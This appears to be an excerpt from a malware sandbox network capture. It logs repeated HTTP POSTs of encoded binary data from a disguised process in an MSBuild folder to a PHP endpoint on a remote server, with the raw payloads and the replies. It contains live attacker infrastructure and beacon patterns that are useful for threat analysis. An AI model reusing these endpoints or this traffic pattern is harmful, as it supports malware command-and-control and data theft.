                                                                                      68 | 192.168.2.4 | 49814 | 91.227.16.11 | 80 | 4520 | C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Mar 6, 2024 09:53:45.454027891 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 1872
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:45.800508022 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:45.800812006 CET | 1872 | OUT | Data Raw: 51 59 51 5b 5e 5a 55 52 5e 57 5a 51 57 5a 50 5a 54 56 54 5f 56 5b 57 5e 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: QYQ[^ZUR^WZQWZPZTVT_V[W^QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X:;1.U'"$%&_,*'#%3!?76//Y$' %<]/%Z"!Q*%
                                                                                      Mar 6, 2024 09:53:46.174747944 CET | 435 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:45 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 39 38 0d 0a 02 11 2e 58 32 05 0a 0d 23 0d 2c 16 3e 3d 00 59 3d 22 32 5e 2b 16 3e 07 28 2f 0c 5c 3b 39 38 55 28 2b 3c 1b 34 59 20 1a 23 31 28 55 25 13 20 5c 05 11 24 01 30 0c 21 58 27 03 29 59 30 08 36 03 26 11 01 09 2b 15 3e 13 24 39 0d 5d 23 55 24 52 25 3a 3c 02 24 2f 21 5e 2e 10 06 01 32 3d 2d 54 02 17 22 1e 25 3d 28 58 2b 30 30 01 32 0c 36 00 28 3e 3f 0f 22 29 0a 1f 35 33 0f 11 31 38 22 58 21 0c 34 00 3f 3b 28 00 30 02 06 50 26 04 23 55 22 00 2c 52 0e 3f 5c 57 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 98.X2#,>=Y="2^+>(/\;98U(+<4Y #1(U% \$0!X')Y06&+>$9]#U$R%:<$/!^.2=-T"%=(X+0026(>?")5318"X!4?;(0P&#U",R?\W0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      69 | 192.168.2.4 | 49815 | 91.227.16.11 | 80 | 4520 | C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Mar 6, 2024 09:53:45.568485975 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:45.909878969 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:45.910088062 CET | 2548 | OUT | Data Raw: 54 51 54 59 5b 5d 55 5c 5e 57 5a 51 57 5c 50 53 54 5c 54 59 56 5d 57 5e 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: TQTY[]U\^WZQW\PST\TYV]W^QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9;!23U"$6&;<"X'8'\2:'65<?_0X&?&\,%Z"!Q*=
                                                                                      Mar 6, 2024 09:53:46.275571108 CET | 286 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:46 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      70 | 192.168.2.4 | 49816 | 91.227.16.11 | 80 | 4520 | C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Mar 6, 2024 09:53:46.745827913 CET | 324 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Mar 6, 2024 09:53:47.088721991 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:47.088987112 CET | 2548 | OUT | Data Raw: 51 59 51 5e 5e 5e 50 51 5e 57 5a 51 57 51 50 5d 54 53 54 53 56 5e 57 5f 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: QYQ^^^PQ^WZQWQP]TSTSV^W_QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9B81"W$#\$/3Z19#!4P5?/Y3781,"[,%Z"!Q*
                                                                                      Mar 6, 2024 09:53:47.457406044 CET | 286 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:47 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      71 | 192.168.2.4 | 49817 | 91.227.16.11 | 80 | 4520 | C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Mar 6, 2024 09:53:47.917309046 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:48.262315989 CET | 2548 | OUT | Data Raw: 54 5e 51 5b 5b 58 55 54 5e 57 5a 51 57 5c 50 59 54 51 54 58 56 54 57 5c 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: T^Q[[XUT^WZQW\PYTQTXVTW\QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9E,-3)[$:,?>0?&9<P!"?]'(%/%,%Z"!Q*=
                                                                                      Mar 6, 2024 09:53:48.262454033 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:48.636464119 CET | 286 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:48 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      72 | 192.168.2.4 | 49818 | 91.227.16.11 | 80 | 4520 | C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Mar 6, 2024 09:53:49.106528997 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:49.451417923 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:49.451735020 CET | 2548 | OUT | Data Raw: 54 5e 54 5a 5e 5c 55 52 5e 57 5a 51 57 51 50 53 54 53 54 5a 56 59 57 5b 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: T^TZ^\UR^WZQWQPSTSTZVYW[QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9@8*$#Z$;&_$8?\2)+!,$"+^3''X2&/)%Z"!Q*
                                                                                      Mar 6, 2024 09:53:49.826376915 CET | 286 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:49 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      73 | 192.168.2.4 | 49819 | 91.227.16.11 | 80 | 4520 | C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Mar 6, 2024 09:53:50.287842989 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:50.629435062 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:50.629688978 CET | 2548 | OUT | Data Raw: 54 59 51 5e 5e 5e 55 55 5e 57 5a 51 57 5a 50 5b 54 55 54 5d 56 5e 57 5c 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: TYQ^^^UU^WZQWZP[TUT]V^W\QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X:83[$59,/6Y&8+]19,", !007\1,;%Z"!Q*%
                                                                                      Mar 6, 2024 09:53:51.001543999 CET | 286 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:50 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      74 | 192.168.2.4 | 49821 | 91.227.16.11 | 80 | 4520 | C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Mar 6, 2024 09:53:51.532035112 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 1872
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:51.874411106 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:51.879584074 CET | 1872 | OUT | Data Raw: 54 5e 51 5d 5e 5a 50 54 5e 57 5a 51 57 58 50 5d 54 5d 54 5e 56 5b 57 55 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: T^Q]^ZPT^WZQWXP]T]T^V[WUQZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9@,W5'#60&^;0^?\1#,(W#?73$7Y%.]8%Z"!Q*-
                                                                                      Mar 6, 2024 09:53:52.253804922 CET | 435 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:52 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 39 38 0d 0a 02 11 2d 03 26 05 02 0c 34 1d 20 54 3d 03 07 06 2a 57 22 12 2b 2b 3e 00 3d 3f 03 00 38 17 20 57 3f 38 20 18 23 59 28 50 36 32 30 55 26 39 20 5c 05 11 27 13 30 54 25 59 33 04 35 13 30 57 2e 06 26 2c 20 1c 2b 2b 3a 58 27 39 24 03 22 33 24 53 31 5c 30 06 30 01 25 5d 3a 2e 24 00 26 3d 2d 54 02 17 22 50 24 2e 27 05 28 0e 28 00 32 54 2a 05 2a 13 24 56 35 3a 3b 0d 35 33 03 10 31 38 3d 01 20 32 0d 13 3f 06 3c 04 24 12 0e 1a 31 14 23 55 22 00 2c 52 0e 3f 5c 57 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 98-&4 T=*W"++>=?8 W?8 #Y(P620U&9 \'0T%Y350W.&, ++:X'9$"3$S1\00%]:.$&=-T"P$.'((2T**$V5:;5318= 2?<$1#U",R?\W0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      75 | 192.168.2.4 | 49822 | 91.227.16.11 | 80 | 4520 | C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Mar 6, 2024 09:53:51.651314020 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:51.994503975 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:51.994788885 CET | 2548 | OUT | Data Raw: 54 5b 54 50 5b 5c 55 54 5e 57 5a 51 57 50 50 5d 54 57 54 53 56 5d 57 55 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: T[TP[\UT^WZQWPP]TWTSV]WUQZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X:/!6$#)Z$!/Y5'^?Y%9$T68Q"+X$4'\2<"Y-)%Z"!Q*
                                                                                      Mar 6, 2024 09:53:52.367233992 CET | 286 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:52 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      76 | 192.168.2.4 | 49823 | 91.227.16.11 | 80 | 4520 | C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Mar 6, 2024 09:53:52.838244915 CET | 324 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Mar 6, 2024 09:53:53.184022903 CET | 2548 | OUT | Data Raw: 54 59 54 50 5b 5d 55 57 5e 57 5a 51 57 5b 50 58 54 57 54 52 56 5f 57 55 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: TYTP[]UW^WZQW[PXTWTRV_WUQZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X:,%'063%,._0?Z%95!,'_'$<&,=;%Z"!Q*!
                                                                                      Mar 6, 2024 09:53:53.184180021 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:53.558501005 CET | 286 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:53 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      77 | 192.168.2.4 | 49824 | 91.227.16.11 | 80 | 4520 | C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Mar 6, 2024 09:53:54.026032925 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:54.371263981 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:54.371597052 CET | 2548 | OUT | Data Raw: 54 5a 51 5b 5b 59 55 53 5e 57 5a 51 57 51 50 58 54 52 54 5a 56 55 57 5b 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: TZQ[[YUS^WZQWQPXTRTZVUW[QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X98:U3310P"_;?>]'3Y2*0",W6+]'$^1,9,%Z"!Q*
                                                                                      Mar 6, 2024 09:53:54.940803051 CET | 286 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:54 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      78 | 192.168.2.4 | 49825 | 91.227.16.11 | 80 | 4520 | C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Mar 6, 2024 09:53:55.406812906 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:53:55.754362106 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:53:55.754659891 CET | 2548 | OUT | Data Raw: 51 5b 54 5a 5b 58 50 54 5e 57 5a 51 57 5b 50 5b 54 55 54 5c 56 5e 57 5d 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: Q[TZ[XPT^WZQW[P[TUT\V^W]QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9.11'39$/2$/\%3"Z;!, 3'<&<*8)%Z"!Q*!
                                                                                      Mar 6, 2024 09:53:56.131896973 CET | 286 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:53:55 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


